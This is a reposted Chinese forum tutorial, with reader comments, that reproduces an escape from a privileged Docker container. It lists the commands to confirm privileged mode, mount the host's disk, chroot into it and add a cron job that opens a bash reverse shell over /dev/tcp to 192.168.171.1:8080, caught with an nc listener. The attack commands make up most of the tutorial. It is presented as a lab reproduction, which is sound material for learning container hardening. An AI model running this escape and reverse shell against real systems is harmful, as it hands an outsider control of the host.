[docker逃逸] Privileged 特权模式逃逸复现

颜清华 · 2025-6-9 16:00:49

本文作者CVE-柠檬i
CSDN：https://blog.csdn.net/weixin_49125123
博客园：https://www.cnblogs.com/CVE-Lemon
微信公众号：Lemon安全
简述

在 Docker 中，Privileged 特权模式赋予容器几乎与宿主机相同的权限，允许其访问所有设备和内核功能。这种模式虽然提供了灵活性，但也带来了安全风险，可能导致容器逃逸，即攻击者从容器内获取宿主机权限。
环境配置

以特权模式创建容器

docker pull centos
docker run -itd --privileged centos /bin/bash

复制代码

查看当前是否为docker环境：

cat /proc/1/cgroup|grep docker

复制代码

systemd-detect-virt 也可以判断当前是否为容器

systemd-detect-virt

复制代码

查看当前是否为特权模式

capsh --print

复制代码

cat /proc/self/status | grep CapEff

复制代码

CapEff为0000001fffffffff，当前容器为特权模式。
复现

使用lsblk查看磁盘

挂载宿主机根目录

mkdir test
mount /dev/sds3 test

复制代码

挂载成功

使用chroot切换根目录，方便进行计划任务反弹shell

chroot test

复制代码

创建计划任务

crontab -e

复制代码

*/1 * * * * /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"

复制代码

攻击机监听反弹shell，成功反弹了宿主机的shell

nc -lvvp 8080

复制代码

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

豌笆 · 2025-10-17 08:33:53

谢谢楼主提供！

扎先 · 2025-10-17 13:23:40

过来提前占个楼

暴灵珊 · 2025-12-21 21:11:14

谢谢楼主提供！

习和璧 · 2026-1-19 09:10:13

感谢分享，下载保存了，貌似很强大

纪晴丽 · 2026-1-21 13:00:54

分享、互助让互联网精神温暖你我

蓬庄静 · 2026-1-24 10:12:36

感谢分享，下载保存了，貌似很强大

支智敏 · 2026-1-25 11:20:54

谢谢分享，辛苦了

粒浊 · 2026-1-26 03:55:42

用心讨论，共获提升！

赏勿 · 2026-1-26 07:38:50

收藏一下不知道什么时候能用到

上官银柳 · 2026-1-26 08:58:49

yyds。多谢分享

管水芸 · 2026-1-30 04:36:31

分享、互助让互联网精神温暖你我

亢安芙 · 2026-2-4 08:42:36

不错，里面软件多更新就更好了

琉艺戕 · 2026-2-5 04:31:27

懂技术并乐意极积无私分享的人越来越少。珍惜

人弧 · 2026-2-10 05:45:31

谢谢分享，辛苦了

余思洁 · 2026-2-10 20:49:32

不错，里面软件多更新就更好了

翁真如 · 2026-2-12 11:08:35

热心回复！

焦尔蕾 · 2026-2-12 23:04:10

分享、互助让互联网精神温暖你我

龙骋唧 · 2026-2-13 09:41:25

新版吗？好像是停更了吧。

嶝扁 · 2026-2-13 23:17:29

谢谢分享，试用一下

账号		自动登录	找回密码
密码			立即注册

[docker逃逸] Privileged 特权模式逃逸复现

相关帖子

回复

浏览过的版块

签约作者

[docker逃逸] Privileged 特权模式逃逸复现

相关帖子

相关推荐

回复

浏览过的版块

签约作者